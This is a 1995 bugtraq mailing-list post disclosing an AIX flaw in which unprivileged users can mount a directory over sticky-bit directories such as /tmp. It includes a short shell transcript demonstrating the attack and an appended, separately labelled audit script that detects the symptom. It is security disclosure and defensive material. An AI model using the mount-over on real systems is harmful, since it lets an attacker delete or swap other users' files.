[1623] in bugtraq


Re: nfs_mount in AIX

daemon@ATHENA.MIT.EDU (Aleph One)
Thu Apr 27 02:56:00 1995

Date: Wed, 26 Apr 1995 11:52:42 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
To: Tom Fitzgerald <fitz@wang.com>
Cc: rick@msc.cornell.edu, bugtraq@fc.net
In-Reply-To: <199504260115.AA06504@fnord.wang.com>

Hi, playing around with this I found another nasty thing.
Check this out:

$ id
uid=666666(www) gid=4294967294(nobody)
$ ls -ld /tmp
drwxrwxrwt   9 bin      bin         2560 Apr 26 09:36 /tmp
$ ls -ld /var/tmp/bah
drwxrwxrwx   2 www      nobody       512 Apr 26 09:31 /var/tmp/bah
$ mount /var/tmp/bah /tmp
$ ls -ld /tmp
drwxrwxrwx   2 www      nobody       512 Apr 26 09:31 /tmp
$ uname -a
AIX ibm1 2 3 000006693700
$

In other words AIX allows anyone to mount a directory onto a directory
or a file onto a file if the user has a) search permissions to the
directory or file to mount and b) write permissions to the directory
or file to mount over. Also in order to mount a block device, a remote
directory or a remote file the process must have root authority. As you
can see the stupid thing never checks the sticky bit in the directory
to mount over! This does not allow us to read the files created on our
mounted directory since they keep the uid.gid of the owner even after we
unmount them, but we can erase the files and maybe fuck around with
a few programs by switching files, etc.... This also includes /var/spool/mail
and any other directories with the sticky bit...

a1
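The transcript above shows what a sticky-bit directory looks like once a user-owned directory has been mounted over it: `ls -ld /tmp` reports `drwxrwxrwx` owned by `www` instead of `drwxrwxrwt` owned by `bin`. The script below is an added example (not part of the original post, and not AIX's own tooling) of the check an administrator can schedule to catch that condition: it walks a list of directories that are expected to be world-writable with the sticky bit (/tmp, /var/tmp, /var/spool/mail and the like) and reports any that are world-writable without it. It assumes a POSIX sh and that `ls -ld` prints the mode in the usual ten-character form shown in the post; the function names `sticky_ok` and `audit_sticky_dirs` are this example's own.

```shell
#!/bin/sh
# Added example: report world-writable directories that have lost the sticky
# bit, which is the visible symptom of the mount-over shown in the post.
# Assumes POSIX sh and the ten-character mode field printed by `ls -ld`.

# sticky_ok DIR
#   returns 0 if DIR is not world-writable, or is world-writable with the
#   sticky bit set; 1 if DIR is world-writable and the sticky bit is missing;
#   2 if DIR cannot be listed.
sticky_ok() {
    dir=$1
    mode=$(ls -ld "$dir" 2>/dev/null | cut -c1-10)
    [ -n "$mode" ] || return 2
    other=$(printf '%s' "$mode" | cut -c8-10)   # permission triple for "other"
    case "$other" in
        ??t|??T) return 0 ;;   # sticky bit present (t = with x, T = without x)
        ?w?)     return 1 ;;   # world-writable, sticky bit missing
        *)       return 0 ;;   # not world-writable, nothing to enforce
    esac
}

# audit_sticky_dirs DIR...
#   prints a warning for each offending directory and returns their count
audit_sticky_dirs() {
    bad=0
    for d in "$@"; do
        rc=0
        sticky_ok "$d" || rc=$?
        case "$rc" in
            1) echo "WARNING: $d is world-writable without the sticky bit"
               bad=$((bad + 1)) ;;
            2) echo "NOTE: $d could not be listed" ;;
        esac
    done
    return "$bad"
}

# Usage: sh check_sticky.sh /tmp /var/tmp /var/spool/mail
if [ $# -gt 0 ]; then
    audit_sticky_dirs "$@"
fi
```

Run it from cron against the directories that matter on the host; a non-zero exit means at least one of them is currently world-writable with no sticky bit, and `mount` output for that path will show whether something has been mounted over it. The check reads only the mode bits, so it flags a plain `chmod 777` just as readily as a mount-over.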

